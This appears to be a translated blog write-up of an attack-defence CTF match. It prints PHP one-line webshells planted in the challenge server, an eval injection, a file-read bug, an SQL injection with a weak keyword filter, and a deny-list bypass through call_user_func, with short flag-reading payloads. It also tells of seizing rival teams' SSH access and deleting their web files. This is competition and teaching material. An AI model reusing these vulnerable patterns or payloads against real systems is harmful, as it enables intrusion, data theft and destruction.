After a period of time, our company has achieved good results in the competition, the competition is divided into theoretical questions and AWD, the morning test theory afternoon AWD. The theory is relatively simple, just finished the test has not yet come out when I thought I could get the first place did not expect a team to test higher than us, look at the second half of the AWD.
The AWD competition mode is a network dogfight mode, each team has a server (Linux host) to maintain, and the administrative user assigned to each team is not root, but a low permission user (www-data or ctf, etc.). Each team needs to harden its own server vulnerabilities (web/ binary, etc.) during the game (can be hardened throughout the game), and attack other teams’ hosts within the specified time (30 minutes after the start of the game) to obtain the corresponding flag score through the vulnerabilities.
Before the competition, I prepared a WAF and file monitoring to protect, and did some basic tasks such as ssh login password modification and website backup. Because the competition environment is pure Intranet, I prepared Intranet communication software – Feiqiu in advance. The first 30 minutes is hardening, with 10 php pages and two one-sentence trojans found in invest.php and.config.php.
invest.php
@eval($_REQUEST['liumang']);
.config.php
<?php
$str=@(string)$_GET['str'];
eval('$str="'.addslashes($str).'";');
?>
WAF is not enabled for the time being because it may affect website services. Ebank.php files can be submitted with get message=/flag。
Ebank.php
<?php
if (isset($_POST['message'])) {
$message = getParsedBody($content_type, $_POST['message']);
$message = urlencode($message);
echo "<script>confirm('请确认您的留言:{$message}');</script>";
}
elseif (isset($_GET['message'])) {
$message = getParsedBody($content_type, file_get_contents($_GET['message']));
$message = urlencode($message);
echo "<script>confirm('请确认您的留言:{$message}');</script>";
}
?>
30 minutes after the end of the hardening began to attack, using the Record.php SQLMAP injection, but failed, you need to save the request file through BP, using this file to SQLMAP.
if (isset($_POST['rate'])) {
$rate = $_POST['rate'];
if(stristr($rate, 'sleep') || stristr($rate, 'benchmark'))
{
die("error");
}
$sql="INSERT INTO rate(`rates`) values('$rate')";
$result = mysqli_query($con, $sql) ;//or die(mysqli_error());
$sql_query = "SELECT LAST_INSERT_ID()";
$result = mysqli_query($con, $sql_query);
while($row = mysqli_fetch_array($result))
{
die("汇率新建成功,汇率编号:".$row[0]);
}
mysqli_close($con);
Systemtime.php has a cross-site and reflection injection, blind to see cross-site did not see reflection injection. The referee didn’t react until the last word.Post func=file_get_contents&p=/flag.
<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
$result = call_user_func($func, $p); //=file_get_contents("/flag")
$a= gettype($result);
if ($a == "string") {
return $result;
} else {return "";}
}
class Test {
var $p = "Y-m-d h:i:s a";
var $func = "date";
function __destruct() {
if ($this->func != "") {
echo gettime($this->func, $this->p);
}
}
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
$func = strtolower($func);
if (!in_array($func,$disable_fun)) {
echo gettime($func, $p);
}else {
die("当前为系统配置功能,禁止瞎搞。");
}
The main point is that we use our smart brains to immediately try to change each other’s ssh password at the end of 30 minutes, get two servers, and make a bold operation, delete the HTML directory of one team, let them down and deduct points, but after a period of time, the SSH permission was taken back by them. It was later learned that the power to restore the environment was used once. This side should have made a lot of money in silence, we also reflected, indeed, the attack should be secretly carried out in silence, perhaps they can not find the password has been changed, but also like the other team every 15 minutes for us “tribute”.
Summary of some of the game’s minor problems:
1. Intranet communication tools are intermittent, delay is large, and sometimes completely unavailable.
2. There is no python environment, so file monitoring is not done.
3. Traffic monitoring is not ready
4. Log analysis is not performed. Logs are viewed only by tail
5. No spam traffic attack